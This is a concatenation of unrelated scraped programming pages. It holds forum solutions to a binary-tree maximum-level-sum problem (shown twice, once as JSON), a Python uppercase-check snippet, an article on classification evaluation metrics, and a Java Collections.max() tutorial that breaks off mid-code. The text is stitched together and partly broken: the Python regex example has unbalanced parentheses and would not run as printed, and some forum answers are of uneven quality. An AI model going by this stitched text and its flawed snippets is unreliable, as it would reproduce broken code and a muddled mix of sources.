bhushan5613 months ago SIMPLEST CPP SOLUTION TIME COMPLEXITY-O(N) int maxLevelSum(Node* root) { // Your code here vector<int>ans; queue<Node*>q; q.push(root); while(!q.empty()) { int sum=0; int n=q.size(); for(int i=0;i<n;i++) { auto temp=q.front(); q.pop(); if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); sum=sum+temp->data; } ans.push_back(sum); } return *max_element(ans.begin(),ans.end()); } 0 anshwalgiri3 months ago int maxLevelSum(Node* root) { Node * temp = root; queue <Node *> nodeQ; int sum = 0, prior_sum=INT_MIN, result, count =0; if (temp == NULL) return -1; nodeQ.push(temp); while (nodeQ.empty() == false) { sum = 0; count = nodeQ.size(); while (count--) { Node *node = nodeQ.front(); sum += node -> data; nodeQ.pop(); if (node -> left != NULL) nodeQ.push(node -> left ); if (node -> right != NULL) nodeQ.push(node -> right ); } result = max (sum, prior_sum); // Keep max value here prior_sum = result; } return result; } 0 abhishekvicky123453 months ago /*Java Solution*/ class Solution { public int max=-1000; public void odd(Stack<Node> s1,Stack<Node> s2) { Node temp; int sum=0; while(s1.size()>0) { temp=s1.pop(); sum=sum+temp.data; if(temp.left!=null) s2.add(temp.left); if(temp.right!=null) s2.add(temp.right); } if(sum>max)max=sum; if(s2.size()>0) even(s1,s2); } public void even(Stack<Node> s1,Stack<Node> s2) { Node temp;int sum=0; while(s2.size()>0) { temp=s2.pop(); sum=sum+temp.data; if(temp.left!=null) s1.add(temp.left); if(temp.right!=null) s1.add(temp.right); } if(sum>max)max=sum; if(s1.size()>0) odd(s1,s2); } public int maxLevelSum(Node root) { Stack<Node> s1=new Stack<>(); Stack<Node> s2=new Stack<>(); if(root==null) return 0; s1.add(root); odd(s1,s2); return max; }} +1 kronizerdeltac3 months ago JAVA SOLUTION - BFS public int maxLevelSum(Node root) { if(root == null) return -1; LinkedList<Node> queue = new LinkedList<>(); queue.addLast(root); int maxSum = -(int) 1e9; while(queue.size() != 0) { int size = queue.size(), sum = 0; while(size-- > 0) { Node rnode = queue.removeFirst(); sum += rnode.data; if(rnode.left != null) queue.addLast(rnode.left); if (rnode.right != null) queue.addLast(rnode.right); } if(sum > maxSum) maxSum = sum; } return maxSum; } 0 mayank20213 months ago c++class Solution{ public: /*You are required to complete below method */ int maxLevelSum(Node* root) { int max=INT_MIN; vector<int> levelsum; lsum(root, 1, levelsum); for(auto i:levelsum) { if(max<i) max=i; } return max; } public: void lsum(Node* root, int l,vector<int> &levelsum ) { if(root) { if(levelsum.size() < l) levelsum.push_back(root->data); else levelsum[l-1]=levelsum[l-1]+root->data; lsum(root->left, l+1, levelsum); lsum(root->right, l+1, levelsum); } } }; 0 riyu20223 months ago SIMPLE PYTHON ITERATIVE class Solution: def maxLevelSum(self, root): # Code here if not root: return False ans = [] res = [] q = deque([root]) while q: level = [] for _ in range(len(q)): node = q.popleft() level.append(node.data) if node.left: q.append(node.left) if node.right: q.append(node.right) ans.append(level) for a in ans: res.append(sum(a)) return max(res) We strongly recommend solving this problem on your own before viewing its editorial. Do you still want to view the editorial? Login to access your submissions. Problem Contest Reset the IDE using the second button on the top right corner. Avoid using static/global variables in your code as your code is tested against multiple test cases and these tend to retain their previous values. Passing the Sample/Custom Test cases does not guarantee the correctness of code. On submission, your code is tested against multiple test cases consisting of all possible corner cases and stress constraints. You can access the hints to get an idea about what is expected of you as well as the final solution code. You can view the solutions submitted by other users from the submission tab.
[ { "code": null, "e": 352, "s": 238, "text": "Given a Binary Tree having positive and negative nodes. Find the maximum sum of a level in the given Binary Tree." }, { "code": null, "e": 363, "s": 352, "text": "Example 1:" }, { "code": null, "e": 633, "s": 363, "text": "Input : \n 4\n / \\\n 2 -5\n / \\ / \\\n -1 3 -2 6\n\nOutput: 6\n\nExplanation :\nSum of all nodes of 0'th level is 4\nSum of all nodes of 1'th level is -3\nSum of all nodes of 2'th level is 6\nHence maximum sum is 6" }, { "code": null, "e": 645, "s": 633, "text": "\nExample 2:" }, { "code": null, "e": 845, "s": 645, "text": "Input : \n 1\n / \\\n 2 3\n / \\ \\\n 4 5 8\n / \\\n 6 7 \n\nOutput : 17\n\nExplanation: Maximum sum is at level 2." }, { "code": null, "e": 1061, "s": 845, "text": "\nYour Task: \nYou dont need to read input or print anything. Complete the function maxLevelSum() which takes root node as input parameter and returns the maximum sum of any horizontal level in the given Binary Tree." }, { "code": null, "e": 1124, "s": 1061, "text": "\nExpected Time Complexity: O(N)\nExpected Auxiliary Space: O(N)" }, { "code": null, "e": 1150, "s": 1124, "text": "\nConstraints:\n1 ≤ N ≤ 104" }, { "code": null, "e": 1152, "s": 1150, "text": "0" }, { "code": null, "e": 1173, "s": 1152, "text": "harshscode1 week ago" }, { "code": null, "e": 1847, "s": 1173, "text": " vector<int> v; queue<Node*> q; q.push(root); while(!q.empty()) { int n=q.size(); int sum=0; while(n--) { Node *temp=q.front(); q.pop(); int p=temp->data; sum+=p; if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); } v.push_back(sum); } int maxx=v[0]; for(int i=0;i<v.size();i++) { if(v[i]>maxx) maxx=v[i]; } return maxx;" }, { "code": null, "e": 1849, "s": 1847, "text": "0" }, { "code": null, "e": 1870, "s": 1849, "text": "detroix071 month ago" }, { "code": null, "e": 2470, "s": 1870, "text": "class Solution { public: /*You are required to complete below method */ int maxLevelSum(Node* root) { queue<Node*> q; q.push(root); q.push(NULL); int sum = 0; int max=INT_MIN; while(q.size()!=0) { Node* Front = q.front(); q.pop(); if(Front==NULL) { if(sum>max) max=sum; sum=0; if(q.size()==0) break; q.push(NULL); } else { sum+=Front->data; if(Front->left!=NULL) q.push(Front->left); if(Front->right!=NULL) q.push(Front->right); } } return max; }};" }, { "code": null, "e": 2472, "s": 2470, "text": "0" }, { "code": null, "e": 2498, "s": 2472, "text": "namanshah22752 months ago" }, { "code": null, "e": 2526, "s": 2498, "text": "SHORT SOLUTION : TIME O(N) " }, { "code": null, "e": 2534, "s": 2526, "text": "0.4 sec" }, { "code": null, "e": 3166, "s": 2536, "text": " int maxLevelSum(Node* root) { queue<Node*> q; int ans = INT_MIN; int newans; q.push(root); while(!q.empty()) { newans = 0; int n = q.size(); while(n--) { Node* p = q.front(); newans = newans + p->data; q.pop(); if(p->left) q.push(p->left); if(p->right) q.push(p->right); } if(newans > ans) ans = newans; } return ans; }}; " }, { "code": null, "e": 3168, "s": 3166, "text": "0" }, { "code": null, "e": 3190, "s": 3168, "text": "owaischem3 months ago" }, { "code": null, "e": 3207, "s": 3190, "text": "PYTHON SOLUTION:" }, { "code": null, "e": 3228, "s": 3207, "text": "TIME TAKEN:12.7/15.5" }, { "code": null, "e": 3277, "s": 3228, "text": "(time taken is high due to the use of recursion)" }, { "code": null, "e": 4038, "s": 3279, "text": "class Solution: def maxLevelSum(self, root): def height(root): if root==None: return 0 left=height(root.left) right=height(root.right) return max(left,right)+1 def level_traversal(root,level): if root==None: return None elif level==0: list1.append(root.data) else: level_traversal(root.left,level-1) level_traversal(root.right,level-1) tall=height(root) maximum=-9999999 list1=[] for i in range(tall): level_traversal(root,i) maximum=max(maximum,sum(list1)) list1=[] return maximum" }, { "code": null, "e": 4040, "s": 4038, "text": "0" }, { "code": null, "e": 4063, "s": 4040, "text": "bhushan5613 months ago" }, { "code": null, "e": 4085, "s": 4063, "text": "SIMPLEST CPP SOLUTION" }, { "code": null, "e": 4106, "s": 4085, "text": "TIME COMPLEXITY-O(N)" }, { "code": null, "e": 4673, "s": 4110, "text": "int maxLevelSum(Node* root) { // Your code here vector<int>ans; queue<Node*>q; q.push(root); while(!q.empty()) { int sum=0; int n=q.size(); for(int i=0;i<n;i++) { auto temp=q.front(); q.pop(); if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); sum=sum+temp->data; } ans.push_back(sum); } return *max_element(ans.begin(),ans.end()); }" }, { "code": null, "e": 4675, "s": 4673, "text": "0" }, { "code": null, "e": 4699, "s": 4675, "text": "anshwalgiri3 months ago" }, { "code": null, "e": 5509, "s": 4699, "text": "int maxLevelSum(Node* root) { Node * temp = root; queue <Node *> nodeQ; int sum = 0, prior_sum=INT_MIN, result, count =0; if (temp == NULL) return -1; nodeQ.push(temp); while (nodeQ.empty() == false) { sum = 0; count = nodeQ.size(); while (count--) { Node *node = nodeQ.front(); sum += node -> data; nodeQ.pop(); if (node -> left != NULL) nodeQ.push(node -> left ); if (node -> right != NULL) nodeQ.push(node -> right ); } result = max (sum, prior_sum); // Keep max value here prior_sum = result; } return result; }" }, { "code": null, "e": 5511, "s": 5509, "text": "0" }, { "code": null, "e": 5542, "s": 5511, "text": "abhishekvicky123453 months ago" }, { "code": null, "e": 5560, "s": 5542, "text": "/*Java Solution*/" }, { "code": null, "e": 6553, "s": 5562, "text": "class Solution { public int max=-1000; public void odd(Stack<Node> s1,Stack<Node> s2) { Node temp; int sum=0; while(s1.size()>0) { temp=s1.pop(); sum=sum+temp.data; if(temp.left!=null) s2.add(temp.left); if(temp.right!=null) s2.add(temp.right); } if(sum>max)max=sum; if(s2.size()>0) even(s1,s2); } public void even(Stack<Node> s1,Stack<Node> s2) { Node temp;int sum=0; while(s2.size()>0) { temp=s2.pop(); sum=sum+temp.data; if(temp.left!=null) s1.add(temp.left); if(temp.right!=null) s1.add(temp.right); } if(sum>max)max=sum; if(s1.size()>0) odd(s1,s2); } public int maxLevelSum(Node root) { Stack<Node> s1=new Stack<>(); Stack<Node> s2=new Stack<>(); if(root==null) return 0; s1.add(root); odd(s1,s2); return max; }}" }, { "code": null, "e": 6556, "s": 6553, "text": "+1" }, { "code": null, "e": 6583, "s": 6556, "text": "kronizerdeltac3 months ago" }, { "code": null, "e": 6603, "s": 6583, "text": "JAVA SOLUTION - BFS" }, { "code": null, "e": 6685, "s": 6605, "text": "public int maxLevelSum(Node root) { if(root == null) return -1;" }, { "code": null, "e": 6795, "s": 6685, "text": " LinkedList<Node> queue = new LinkedList<>(); queue.addLast(root); int maxSum = -(int) 1e9;" }, { "code": null, "e": 6984, "s": 6795, "text": " while(queue.size() != 0) { int size = queue.size(), sum = 0; while(size-- > 0) { Node rnode = queue.removeFirst(); sum += rnode.data;" }, { "code": null, "e": 7152, "s": 6984, "text": " if(rnode.left != null) queue.addLast(rnode.left); if (rnode.right != null) queue.addLast(rnode.right);" }, { "code": null, "e": 7253, "s": 7152, "text": " } if(sum > maxSum) maxSum = sum; } return maxSum; }" }, { "code": null, "e": 7255, "s": 7253, "text": "0" }, { "code": null, "e": 7278, "s": 7255, "text": "mayank20213 months ago" }, { "code": null, "e": 7524, "s": 7278, "text": "c++class Solution{ public: /*You are required to complete below method */ int maxLevelSum(Node* root) { int max=INT_MIN; vector<int> levelsum; lsum(root, 1, levelsum); for(auto i:levelsum) { if(max<i) max=i; }" }, { "code": null, "e": 7919, "s": 7524, "text": " return max; } public: void lsum(Node* root, int l,vector<int> &levelsum ) { if(root) { if(levelsum.size() < l) levelsum.push_back(root->data); else levelsum[l-1]=levelsum[l-1]+root->data; lsum(root->left, l+1, levelsum); lsum(root->right, l+1, levelsum); } } };" }, { "code": null, "e": 7921, "s": 7919, "text": "0" }, { "code": null, "e": 7942, "s": 7921, "text": "riyu20223 months ago" }, { "code": null, "e": 7966, "s": 7942, "text": "SIMPLE PYTHON ITERATIVE" }, { "code": null, "e": 8541, "s": 7966, "text": "class Solution:\n def maxLevelSum(self, root):\n # Code here\n if not root:\n return False\n ans = []\n res = []\n q = deque([root])\n while q:\n level = []\n for _ in range(len(q)):\n node = q.popleft()\n level.append(node.data)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n ans.append(level)\n for a in ans:\n res.append(sum(a))\n return max(res)" }, { "code": null, "e": 8687, "s": 8541, "text": "We strongly recommend solving this problem on your own before viewing its editorial. Do you still\n want to view the editorial?" }, { "code": null, "e": 8723, "s": 8687, "text": " Login to access your submissions. " }, { "code": null, "e": 8733, "s": 8723, "text": "\nProblem\n" }, { "code": null, "e": 8743, "s": 8733, "text": "\nContest\n" }, { "code": null, "e": 8806, "s": 8743, "text": "Reset the IDE using the second button on the top right corner." }, { "code": null, "e": 8954, "s": 8806, "text": "Avoid using static/global variables in your code as your code is tested against multiple test cases and these tend to retain their previous values." }, { "code": null, "e": 9162, "s": 8954, "text": "Passing the Sample/Custom Test cases does not guarantee the correctness of code. On submission, your code is tested against multiple test cases consisting of all possible corner cases and stress constraints." }, { "code": null, "e": 9268, "s": 9162, "text": "You can access the hints to get an idea about what is expected of you as well as the final solution code." } ]
How to check if a string contains only upper case letters in Python?
We can check if a string contains only upper case letters using 2 methods. First is using method isupper(). print( 'Hello world'.isupper()) print('HELLO'.isupper()) False True You can also use regexes for the same result. For matching only uppercase, we can call the re.match(regex, string) using the regex: "^[A-Z]+$". import re print(bool(re.match('^[A-Z]+$', '123aAbc')) print(bool(re.match('^[A-Z]+$', 'ABC')) False True
[ { "code": null, "e": 1171, "s": 1062, "text": "We can check if a string contains only upper case letters using 2 methods. First is using method isupper(). " }, { "code": null, "e": 1228, "s": 1171, "text": "print( 'Hello world'.isupper())\nprint('HELLO'.isupper())" }, { "code": null, "e": 1239, "s": 1228, "text": "False\nTrue" }, { "code": null, "e": 1384, "s": 1239, "text": "You can also use regexes for the same result. For matching only uppercase, we can call the re.match(regex, string) using the regex: \"^[A-Z]+$\". " }, { "code": null, "e": 1478, "s": 1384, "text": "import re\nprint(bool(re.match('^[A-Z]+$', '123aAbc'))\nprint(bool(re.match('^[A-Z]+$', 'ABC'))" }, { "code": null, "e": 1489, "s": 1478, "text": "False\nTrue" } ]
Evaluation Metrics for Classification Explained | by Eunjoo Byeon | Towards Data Science
Evaluation metric refers to a measure that we use to evaluate different models. Choosing an appropriate evaluation metric is a decision problem that requires a thorough understanding of the goal of a project and is a fundamental step before all modeling process that follows. So why is it so important, and how should we choose? Let’s say you live in a city where it is sunny about 300 days a year. During the other 65 days, it gets very uncomfortable with heavy rain or snow. In this imaginary world, there are only two weather apps. One app predicts the weather correctly 80% of the time, while the other one is right about 70% of the time. Which app would you choose? If an app always predicts sunny in this city, this app will be 80% correct, even though it never predicts bad weather accurately. In this case, this app is useless! On the other hand, the other app might fail to predict the sunny weather about 30% of the time, but it will tell you about bad weather accurately over 80% of the time. In this case, this app that correctly predicts the weather 70% of the time is much more useful than the 80% app. As we can see here, how we choose to evaluate our model can tell vastly different information about our data. It must be determined by the goal of the project and the properties of the dataset. No data will be without its variance, and no model can explain the world perfectly. So we must know where we would rather have such prediction errors to happen. When a model makes a binary prediction, there are 4 possible outcomes. A model can predict yes (positive) or no (negative), and it can either be correct (true) or wrong (false). The same logic applies when a model is making a multi-class prediction. The model predicts yes or no for an individual class, and it can be right or it can be wrong, and we decide how to combine these individual outcomes. But how we may interpret a model goes beyond these four outcomes. For one, true positive (TP) involves two events: model prediction and the actual state. Our interpretation can change based on how we want to prioritize these two events. We can see whether the model predicted positive when the actual value was positive, or we can see whether the actual value was positive when the model predicted positive. Let’s say when the weather is sunny, there is an 80% chance that the app would predict it to be sunny. But this does not tell us anything useful in this context. Instead, we should see how often the weather is sunny when the app says so. This will tell us how precise the app’s prediction is in predicting sunny days. This is the precision metric, representing the probability of the model being correct out of all the times model said yes. from sklearn.metrics import precision_scoreprecision_score(actual_y, predicted_y)# scoring parameter: ‘precision’ But sometimes knowing the probability of positive prediction out of all positive cases might be more important. Imagine we are predicting whether a food is poisonous or not. The precision of a model (a chance of food being poisonous when it is predicted to be) is not as important as predicting food to be poisonous when it is poisonous. Because if the model says it’s poisonous we can simply not eat it, but if it fails to tell us that, we risk eating poisonous food. So we want a model that has a high probability of predicting positive when food is poisonous. This is a case for the recall or sensitivity metric. It’s also called the true positive rate. It represents how sensitive our model is in detecting positive cases. from sklearn.metrics import recall_scorerecall_score(actual_y, predicted_y)# scoring parameter: ‘recall’ But what if both of these are important? In other words, what should we do when not missing positive cases and not missing negative cases are equally important? Imagine you are predicting a disease that can be cured by a certain treatment. But this treatment can be detrimental to those without the disease. In this case, we need a model that is sensitive to detecting positive cases and equally precise in its detection. That’s when the F1 Score comes into play. F1 Score is the harmonic mean of precision and recall, an average between precision and recall ratios. from sklearn.metrics import f1_scoref1_score(actual_y, predicted_y)# scoring parameter: ‘f1’ Precision and recall metrics focus on predicting positive cases: saying yes to the question of ‘Is this ___?’. But as we saw earlier there are two different ways a model can be correct: it can say yes when it should say yes, and it can say no when it should say no. Accuracy is a probability of being correct in both of these cases. We can use accuracy when classes are equally balanced. For example, let’s say we want to predict whether a picture is a dog or not. We just want the model to say yes when it’s a dog, and no when it’s not. Saying that it’s a dog when it is a cat does not have any different consequences than saying that it’s not a dog when it is a dog. In this case, we can use accuracy. from sklearn.metrics import accuracy_scoreaccuracy_score(actual_y, predicted_y)# scoring parameter: ‘accuracy’ Lastly, specificity is a sensitivity of predicting the negative cases (probability of predicting negatives out of all negative cases). In other words, we can use specificity when it’s more important to not miss negative cases than to be wrong. Let’s say you want to know if the water from a well is drinkable or not. You’d rather mark drinkable water not drinkable than to wrongfully mark undrinkable ‘drinkable’. If we swap our positive and negative and ask a question of ‘is this water contagious?’, we would be using sensitivity instead of specificity. Specificity does not have a built-in function within the Sci-kit Learn package. Instead, you can either use sensitivity and swap positive and negative cases or calculate it through custom function using the confusion matrix. # custom function to calculate specificity for binary classificationfrom sklearn.metrics import confusion_matrixdef specificity_score(y_true, y_predicted): cm = confusion_matrix(y_true, y_predicted) return cm[0, 0] / (cm[0, 0] + cm[0, 1])print(specificity_score(y_true, y_predicted)) We reviewed how to choose evaluation metrics for our binary classification data. But what do we do when our target is not yes or no but comprised of multiple categories? One way is to count each outcome globally regardless of within-class distribution and calculate the metric. We can accomplish this by using the micro average. Let’s think about what it means to use global counts. If we just look at the global outcome, we don’t have the four outcomes as before (TP, TN, FP, FN). Instead we have cases that are true (prediction = actual class) or false (prediction != actual class). Therefore, the micro precision, micro recall, and accuracy all represent the probability of accurate prediction and are equal. Also since the F1 Score is the harmonic mean of precision and recall, the micro F1 Score is the same as other metrics. # these are all the samerecall_score(actual_y, predicted_y, average = 'micro')precision_score(actual_y, predicted_y, average = 'micro')accuracy_score(actual_y, predicted_y)f1_score(actual_y, predicted_y, average = 'micro')# scoring parameter: 'f1_micro', 'recall_micro', 'precision_micro' Counting global outcomes disregards the distribution of predictions within each class (it just counts how many got it right). This can be helpful when the dataset has classes that are highly imbalanced and when we do not care about controlling prediction errors in any specific class. But as we discussed above, many of our problems do involve having specific control over where prediction errors come from. Another method to deal with multi-class is to simply calculate the binary measures for each class. For example, if our target variable can be either cat, dog, or bird, we get a binary yes or no answer for each prediction. Is this a cat? Is this a dog? Is this a bird? This will lead to as many scores as a number of our target classes. Then we can aggregate these scores and turn them into a single metric using a macro average or weighted average. Macro average calculates metrics for individual class then computes the average of them. This means that it gives equal weight to the results returned from each class regardless of their overall size. So it is not sensitive to the size of each class, but it takes the performance of individual class more seriously even when it’s a minority. Therefore, the macro average is a good measure if predicting minority class well is as important as the overall accuracy and we also believe that there is a reliable amount of information in the minority class to represent the ground truth pattern accurately. The macro average recall score is the same as the balanced accuracy in multi-class problems. print(f1_score(actual_y, predicted_y, average = 'macro'))print(precision_score(actual_y, predicted_y, average = 'macro'))# below two are the same measuresfrom sklearn.metrics import balanced_accuracy_score, recall_scoreprint(recall_score(actual_y, predicted_y, average = 'macro'))print(balanced_accuracy_score(actual_y, predicted_y))# scoring parameter: 'f1_macro', 'recall_macro', ...etc. To recap, the micro average gives equal weight to individual observations, and the macro average gives equal weight to individual classes. The macro average by definition does not care about how much data each class has. So even when the minority class does not have enough data to show a reliable pattern, it will still weigh the minority class equally. If this is the case, we might want to consider the overall size of each class by using a weighted average. # we can also compute precision, recall, and f1 at the same timefrom sklearn.metrics import precision_recall_fscore_supportprecision_recall_fscore_support(actual_y, predicted_y, average = 'weighted')# scoring parameter: 'f1_weighted', 'recall_weighted', ...etc. Each of the metrics we discussed so far individually tells a part of a story, and that was why we wanted to make sure our goal is clear and aligns with the metric we choose. But what if we just want a measure that can holistically tell us how our model classification is doing relative to a random chance? Cohen’s Kappa compares the classifier’s performance to that of a random classifier. Naturally, it takes the class imbalance into account as the random classifier will rely on the distribution of each class. Unlike other measures that are probabilities, Cohen’s Kappa ranges from -1 to 1. from sklearn.metrics import cohen_kappa_scoreprint(cohen_kappa_score(actual_y, predicted_y)) We looked at how each evaluation metrics for binary and multi-class classification are uniquely utilized for individual problems, and why it’s important to care about metrics we choose. I tried to go over the most foundational measures in plain English. But I still left off another very important metric, ROC/AUC score, which I will discuss in another post sometime.
[ { "code": null, "e": 501, "s": 172, "text": "Evaluation metric refers to a measure that we use to evaluate different models. Choosing an appropriate evaluation metric is a decision problem that requires a thorough understanding of the goal of a project and is a fundamental step before all modeling process that follows. So why is it so important, and how should we choose?" }, { "code": null, "e": 843, "s": 501, "text": "Let’s say you live in a city where it is sunny about 300 days a year. During the other 65 days, it gets very uncomfortable with heavy rain or snow. In this imaginary world, there are only two weather apps. One app predicts the weather correctly 80% of the time, while the other one is right about 70% of the time. Which app would you choose?" }, { "code": null, "e": 1289, "s": 843, "text": "If an app always predicts sunny in this city, this app will be 80% correct, even though it never predicts bad weather accurately. In this case, this app is useless! On the other hand, the other app might fail to predict the sunny weather about 30% of the time, but it will tell you about bad weather accurately over 80% of the time. In this case, this app that correctly predicts the weather 70% of the time is much more useful than the 80% app." }, { "code": null, "e": 1644, "s": 1289, "text": "As we can see here, how we choose to evaluate our model can tell vastly different information about our data. It must be determined by the goal of the project and the properties of the dataset. No data will be without its variance, and no model can explain the world perfectly. So we must know where we would rather have such prediction errors to happen." }, { "code": null, "e": 2044, "s": 1644, "text": "When a model makes a binary prediction, there are 4 possible outcomes. A model can predict yes (positive) or no (negative), and it can either be correct (true) or wrong (false). The same logic applies when a model is making a multi-class prediction. The model predicts yes or no for an individual class, and it can be right or it can be wrong, and we decide how to combine these individual outcomes." }, { "code": null, "e": 2452, "s": 2044, "text": "But how we may interpret a model goes beyond these four outcomes. For one, true positive (TP) involves two events: model prediction and the actual state. Our interpretation can change based on how we want to prioritize these two events. We can see whether the model predicted positive when the actual value was positive, or we can see whether the actual value was positive when the model predicted positive." }, { "code": null, "e": 2893, "s": 2452, "text": "Let’s say when the weather is sunny, there is an 80% chance that the app would predict it to be sunny. But this does not tell us anything useful in this context. Instead, we should see how often the weather is sunny when the app says so. This will tell us how precise the app’s prediction is in predicting sunny days. This is the precision metric, representing the probability of the model being correct out of all the times model said yes." }, { "code": null, "e": 3007, "s": 2893, "text": "from sklearn.metrics import precision_scoreprecision_score(actual_y, predicted_y)# scoring parameter: ‘precision’" }, { "code": null, "e": 3734, "s": 3007, "text": "But sometimes knowing the probability of positive prediction out of all positive cases might be more important. Imagine we are predicting whether a food is poisonous or not. The precision of a model (a chance of food being poisonous when it is predicted to be) is not as important as predicting food to be poisonous when it is poisonous. Because if the model says it’s poisonous we can simply not eat it, but if it fails to tell us that, we risk eating poisonous food. So we want a model that has a high probability of predicting positive when food is poisonous. This is a case for the recall or sensitivity metric. It’s also called the true positive rate. It represents how sensitive our model is in detecting positive cases." }, { "code": null, "e": 3839, "s": 3734, "text": "from sklearn.metrics import recall_scorerecall_score(actual_y, predicted_y)# scoring parameter: ‘recall’" }, { "code": null, "e": 4406, "s": 3839, "text": "But what if both of these are important? In other words, what should we do when not missing positive cases and not missing negative cases are equally important? Imagine you are predicting a disease that can be cured by a certain treatment. But this treatment can be detrimental to those without the disease. In this case, we need a model that is sensitive to detecting positive cases and equally precise in its detection. That’s when the F1 Score comes into play. F1 Score is the harmonic mean of precision and recall, an average between precision and recall ratios." }, { "code": null, "e": 4499, "s": 4406, "text": "from sklearn.metrics import f1_scoref1_score(actual_y, predicted_y)# scoring parameter: ‘f1’" }, { "code": null, "e": 5203, "s": 4499, "text": "Precision and recall metrics focus on predicting positive cases: saying yes to the question of ‘Is this ___?’. But as we saw earlier there are two different ways a model can be correct: it can say yes when it should say yes, and it can say no when it should say no. Accuracy is a probability of being correct in both of these cases. We can use accuracy when classes are equally balanced. For example, let’s say we want to predict whether a picture is a dog or not. We just want the model to say yes when it’s a dog, and no when it’s not. Saying that it’s a dog when it is a cat does not have any different consequences than saying that it’s not a dog when it is a dog. In this case, we can use accuracy." }, { "code": null, "e": 5314, "s": 5203, "text": "from sklearn.metrics import accuracy_scoreaccuracy_score(actual_y, predicted_y)# scoring parameter: ‘accuracy’" }, { "code": null, "e": 5870, "s": 5314, "text": "Lastly, specificity is a sensitivity of predicting the negative cases (probability of predicting negatives out of all negative cases). In other words, we can use specificity when it’s more important to not miss negative cases than to be wrong. Let’s say you want to know if the water from a well is drinkable or not. You’d rather mark drinkable water not drinkable than to wrongfully mark undrinkable ‘drinkable’. If we swap our positive and negative and ask a question of ‘is this water contagious?’, we would be using sensitivity instead of specificity." }, { "code": null, "e": 6095, "s": 5870, "text": "Specificity does not have a built-in function within the Sci-kit Learn package. Instead, you can either use sensitivity and swap positive and negative cases or calculate it through custom function using the confusion matrix." }, { "code": null, "e": 6385, "s": 6095, "text": "# custom function to calculate specificity for binary classificationfrom sklearn.metrics import confusion_matrixdef specificity_score(y_true, y_predicted): cm = confusion_matrix(y_true, y_predicted) return cm[0, 0] / (cm[0, 0] + cm[0, 1])print(specificity_score(y_true, y_predicted))" }, { "code": null, "e": 6714, "s": 6385, "text": "We reviewed how to choose evaluation metrics for our binary classification data. But what do we do when our target is not yes or no but comprised of multiple categories? One way is to count each outcome globally regardless of within-class distribution and calculate the metric. We can accomplish this by using the micro average." }, { "code": null, "e": 7216, "s": 6714, "text": "Let’s think about what it means to use global counts. If we just look at the global outcome, we don’t have the four outcomes as before (TP, TN, FP, FN). Instead we have cases that are true (prediction = actual class) or false (prediction != actual class). Therefore, the micro precision, micro recall, and accuracy all represent the probability of accurate prediction and are equal. Also since the F1 Score is the harmonic mean of precision and recall, the micro F1 Score is the same as other metrics." }, { "code": null, "e": 7505, "s": 7216, "text": "# these are all the samerecall_score(actual_y, predicted_y, average = 'micro')precision_score(actual_y, predicted_y, average = 'micro')accuracy_score(actual_y, predicted_y)f1_score(actual_y, predicted_y, average = 'micro')# scoring parameter: 'f1_micro', 'recall_micro', 'precision_micro'" }, { "code": null, "e": 7913, "s": 7505, "text": "Counting global outcomes disregards the distribution of predictions within each class (it just counts how many got it right). This can be helpful when the dataset has classes that are highly imbalanced and when we do not care about controlling prediction errors in any specific class. But as we discussed above, many of our problems do involve having specific control over where prediction errors come from." }, { "code": null, "e": 8362, "s": 7913, "text": "Another method to deal with multi-class is to simply calculate the binary measures for each class. For example, if our target variable can be either cat, dog, or bird, we get a binary yes or no answer for each prediction. Is this a cat? Is this a dog? Is this a bird? This will lead to as many scores as a number of our target classes. Then we can aggregate these scores and turn them into a single metric using a macro average or weighted average." }, { "code": null, "e": 8964, "s": 8362, "text": "Macro average calculates metrics for individual class then computes the average of them. This means that it gives equal weight to the results returned from each class regardless of their overall size. So it is not sensitive to the size of each class, but it takes the performance of individual class more seriously even when it’s a minority. Therefore, the macro average is a good measure if predicting minority class well is as important as the overall accuracy and we also believe that there is a reliable amount of information in the minority class to represent the ground truth pattern accurately." }, { "code": null, "e": 9057, "s": 8964, "text": "The macro average recall score is the same as the balanced accuracy in multi-class problems." }, { "code": null, "e": 9447, "s": 9057, "text": "print(f1_score(actual_y, predicted_y, average = 'macro'))print(precision_score(actual_y, predicted_y, average = 'macro'))# below two are the same measuresfrom sklearn.metrics import balanced_accuracy_score, recall_scoreprint(recall_score(actual_y, predicted_y, average = 'macro'))print(balanced_accuracy_score(actual_y, predicted_y))# scoring parameter: 'f1_macro', 'recall_macro', ...etc." }, { "code": null, "e": 9909, "s": 9447, "text": "To recap, the micro average gives equal weight to individual observations, and the macro average gives equal weight to individual classes. The macro average by definition does not care about how much data each class has. So even when the minority class does not have enough data to show a reliable pattern, it will still weigh the minority class equally. If this is the case, we might want to consider the overall size of each class by using a weighted average." }, { "code": null, "e": 10171, "s": 9909, "text": "# we can also compute precision, recall, and f1 at the same timefrom sklearn.metrics import precision_recall_fscore_supportprecision_recall_fscore_support(actual_y, predicted_y, average = 'weighted')# scoring parameter: 'f1_weighted', 'recall_weighted', ...etc." }, { "code": null, "e": 10765, "s": 10171, "text": "Each of the metrics we discussed so far individually tells a part of a story, and that was why we wanted to make sure our goal is clear and aligns with the metric we choose. But what if we just want a measure that can holistically tell us how our model classification is doing relative to a random chance? Cohen’s Kappa compares the classifier’s performance to that of a random classifier. Naturally, it takes the class imbalance into account as the random classifier will rely on the distribution of each class. Unlike other measures that are probabilities, Cohen’s Kappa ranges from -1 to 1." }, { "code": null, "e": 10858, "s": 10765, "text": "from sklearn.metrics import cohen_kappa_scoreprint(cohen_kappa_score(actual_y, predicted_y))" } ]
Collections max() method in Java with Examples - GeeksforGeeks
11 May, 2021 The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the natural ordering of its elements. All elements in the collection must implement the Comparable interface. Furthermore, all elements in the collection must be mutually comparable (that is, e1.compareTo(e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection. Syntax: public static <T extends Object & Comparable> T max(Collection coll) Parameters: This method takes the collection coll as a parameter whose maximum element is to be determined.Return Value: This method returns the maximum element of the given collection, according to the natural ordering of its elements. Exception: This method throws following Exception: ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers). NoSuchElementException – if the collection is empty Below are the examples to illustrate the max() method Example 1: Java // Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println("Max 